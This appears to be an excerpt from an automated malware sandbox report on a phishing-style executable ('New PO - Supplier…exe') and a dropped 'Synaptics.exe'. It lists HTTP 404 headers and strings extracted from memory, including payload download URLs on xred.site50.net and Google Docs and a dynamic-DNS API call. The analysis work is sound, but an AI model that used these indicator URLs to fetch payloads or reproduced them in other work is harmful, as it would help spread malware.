                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7amO0ZLM5ngsJWlKopLebCK2xDHSAc3h7N4CjFS0Nl-sboq46qA-GFRY47JftW28Vfpky-nJIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 24 Dec 2024 17:21:29 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-r3iLReYBnGK3BnBc1rQnyw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC664O23TkCl0mP_zKOYnXz9pUqBg-lSkxlnehcM4q45z0NPYzwMpqfyZVwxtnxD7bRyContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 24 Dec 2024 17:21:39 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-gzHb37A3dDu2PAKfqlrN1w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6anN6xTThJPNxJh4-oRxnx-Y-LyqS9o3ErQtwk0A3QmlwB-oTqs5JNz6LOhpDonrX-IKEELzwContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 24 Dec 2024 17:21:39 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-sE3a1WlXghqLlKqVoNJNNw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4S99C6FJ_ymN-OcNZ624E2o0fYScXPrcR6RPWd5ZmcfOU43HWcCILwegSf7imVW5lEGKaiW_YContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 24 Dec 2024 17:21:44 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-t9hZTDDEy-CmHqskxMsdsA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6IUec-h0_uXlTdOm2ngmUhFNFSlJHTMtBegcESr43wOLrnaTa-j2C3NDzxHoPkB6ra4_RXZ_wContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 24 Dec 2024 17:21:45 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-9FLXBR3QXg26etNw40Jj-Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7bMQOL0YxAf0kkPrbWS1eD2JOIBEY66VWeJU5R6ZQq8UZqSvjSugrY89VVeJy0fo3bSt_jTnoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 24 Dec 2024 17:21:51 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-6c8jDejuWJtJwaQxV57AQA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5WLpgcBNDUfLrJRL8_akqodRuvQj1STTWbdNnH6J5dVc9Pk-uYLJvNYCegNswaeiMvN7Yc464Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 24 Dec 2024 17:21:51 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-EaBuMDb-tlbLnYyLo76xjg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: Synaptics.exe, 00000002.00000002.4077968992.00000000022E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.000000000088B000.00000004.00000020.00020000.00000000.sdmp, New PO - Supplier 0202AW-PER2.exe, ~$cache1.2.drString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                Source: New PO - Supplier 0202AW-PER2.exe, 00000000.00000003.1689829059.0000000002200000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978H
                                Source: ._cache_New PO - Supplier 0202AW-PER2.exe, 00000001.00000002.4543305344.0000000001154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-score.com/checkip/
                                Source: New PO - Supplier 0202AW-PER2.exe, 00000000.00000003.1689829059.0000000002200000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dl
                                Source: New PO - Supplier 0202AW-PER2.exe, 00000000.00000000.1681174852.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, Synaptics.exe, 00000002.00000002.4077968992.00000000022E0000.00000004.00001000.00020000.00000000.sdmp, ~$cache1.2.drString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
                                Source: Synaptics.exe, 00000002.00000002.4077968992.00000000022E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll6
                                Source: New PO - Supplier 0202AW-PER2.exe, 00000000.00000000.1681174852.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, Synaptics.exe, 00000002.00000002.4077968992.00000000022E0000.00000004.00001000.00020000.00000000.sdmp, ~$cache1.2.drString found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
                                Source: Synaptics.exe, 00000002.00000002.4077968992.00000000022E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SUpdate.iniZ
                                Source: New PO - Supplier 0202AW-PER2.exe, 00000000.00000000.1681174852.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, Synaptics.exe, 00000002.00000002.4077968992.00000000022E0000.00000004.00001000.00020000.00000000.sdmp, ~$cache1.2.drString found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
                                Source: New PO - Supplier 0202AW-PER2.exe, 00000000.00000003.1689829059.0000000002200000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/Synaptics.rar8
                                Source: Synaptics.exe, 00000002.00000002.4077968992.00000000022E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/Synaptics.rarZ
                                Source: Synaptics.exe, 00000002.00000002.4128174320.000000000D3DE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4131914637.000000000E41E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4145646856.000000000FD5E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4114641588.000000000A1BE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google
                                Source: Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.000000000088B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/
                                Source: Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/2
                                Source: Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.000000000088B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/8
                                Source: Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/8J
                                Source: Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/8R
                                Source: Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/8Z
                                Source: Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/8b
                                Source: Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/8j
                                Source: Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/:
                                Source: Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/B
                                Source: Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/R
                                Source: Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/Z
                                Source: Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/b
                                Source: Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/d
                                Source: Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/dJ
                                Source: Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/dR
                                Source: Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/derj
                                Source: Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/r
                                Source: Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/rj
                                Source: New PO - Supplier 0202AW-PER2.exe, 00000000.00000003.1689829059.0000000002200000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downlo
                                Source: New PO - Supplier 0202AW-PER2.exe, 00000000.00000000.1681174852.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, Synaptics.exe, 00000002.00000002.4077968992.00000000022E0000.00000004.00001000.00020000.00000000.sdmp, ~$cache1.2.drString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
                                Source: Synaptics.exe, 00000002.00000002.4077968992.00000000022E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downloadN
                                Source: New PO - Supplier 0202AW-PER2.exe, 00000000.00000003.1689829059.0000000002200000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downlo
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4092977786.0000000007CAE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4161314687.00000000178BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4160431770.0000000016EBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4206204022.0000000022CBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4089808848.0000000006C6E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4088021839.0000000005D9E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4151840183.000000001227E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4158484341.0000000015ABE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4159029263.00000000160FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4157228035.0000000014CFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4195865068.000000001E5FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4198752452.000000001F9FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4155419429.0000000013DFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4167668347.000000001A5BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4085752210.000000000565E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4171615042.000000001BC3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4151978119.00000000123BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4201279990.0000000020AFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4210765812.00000000246FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4195449648.000000001E37E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4144627466.000000000F1F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#0
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#D
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#E
                                Source: Synaptics.exe, 00000002.00000002.4138668254.000000000EF66000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.000000000818E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4194221853.000000001DE3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$N
                                Source: Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%2
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%G
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%a
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%f
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%fG
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%k
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA7A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4181138413.000000001D7E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&1
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&F
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&R
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&_
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&eD
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4138668254.000000000EF66000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4181138413.000000001D7E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(H
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(gB
                                Source: Synaptics.exe, 00000002.00000002.4139287238.000000000EFD2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA7A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DB27000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4188042164.000000001DCEB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4085838285.000000000568F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)9T
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)e
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)kC
                                Source: Synaptics.exe, 00000002.00000002.4093452234.00000000080AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)w
